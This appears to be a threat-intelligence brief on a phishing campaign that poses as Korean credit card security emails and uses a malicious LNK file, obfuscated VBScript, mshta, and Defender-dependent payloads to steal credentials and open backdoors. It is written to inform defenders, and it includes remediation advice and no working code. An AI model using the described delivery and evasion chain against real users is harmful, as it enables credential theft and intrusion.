Essential Insights
- Attackers disguise malicious files as legitimate security emails from a major credit card company, leveraging obfuscated scripts and environment-dependent payloads to evade detection.
- Malicious behavior varies based on whether security services like Windows Defender are active, downloading data-stealing, keylogging, backdoor, and credential theft tools.
- The malware employs environment-aware techniques, such as decrypting and loading DLLs to evade virtualized analysis, while targeting browsers and email clients for sensitive data exfiltration.
Threat Overview, Attack Techniques, and Targets
The threat involves malicious files disguised as security emails from a major credit card company in Korea. Attackers target users who open these emails. They use a malicious LNK (shortcut) file that runs an obfuscated VBScript via mshta.exe. This script executes a hidden HTA (HTML Application) file, which then downloads and runs decoy documents that look real. The malware checks if Windows Defender’s security service is active. Depending on this, it downloads different malicious files.
If Windows Defender is active, the malware uses Curl to download an encrypted pipe.log file. After decryption and decompression, it runs files that steal information and open backdoors. If Defender is off, the malware downloads specific files in the %LocalAppData% folder, including user.txt and sys.log. The sys.log is decrypted to run sys.dll, which loads additional malicious tools. The files target formats like logs, PowerShell scripts, and HTML files.
Targets include users of credit card data, browser accounts, email clients, and cryptocurrency wallets. The malware also imitates legitimate documents to trick victims into opening links or files.
Impact, Security Implications, and Remediation Guidance
The malware can steal sensitive user information such as browser accounts, email data, and clipboard content. It also opens backdoors for remote command control. This can lead to data theft, unauthorized access, and potential financial fraud. The attack exploits trust by disguising malicious files as secure emails. It changes its behavior based on the security environment, which makes it more difficult to detect.
For organizations, this attack underlines the importance of verifying email sources and checking system integrity. When infected, users should avoid executing suspicious files. Immediate steps include checking registry entries for anomalies and deleting malicious files found in temporary folders or the %LocalAppData% path.
As specific remediation steps depend on the environment, users and organizations should consult their security vendors or official guidance for detailed procedures. They should also consider monitoring network traffic for known malicious URLs and updating security tools to detect similar threats.
Continue Your Tech Journey
Explore the future of technology with our detailed insights on Artificial Intelligence.
Explore past and present digital transformations on the Internet Archive.
ThreatIntel-V1
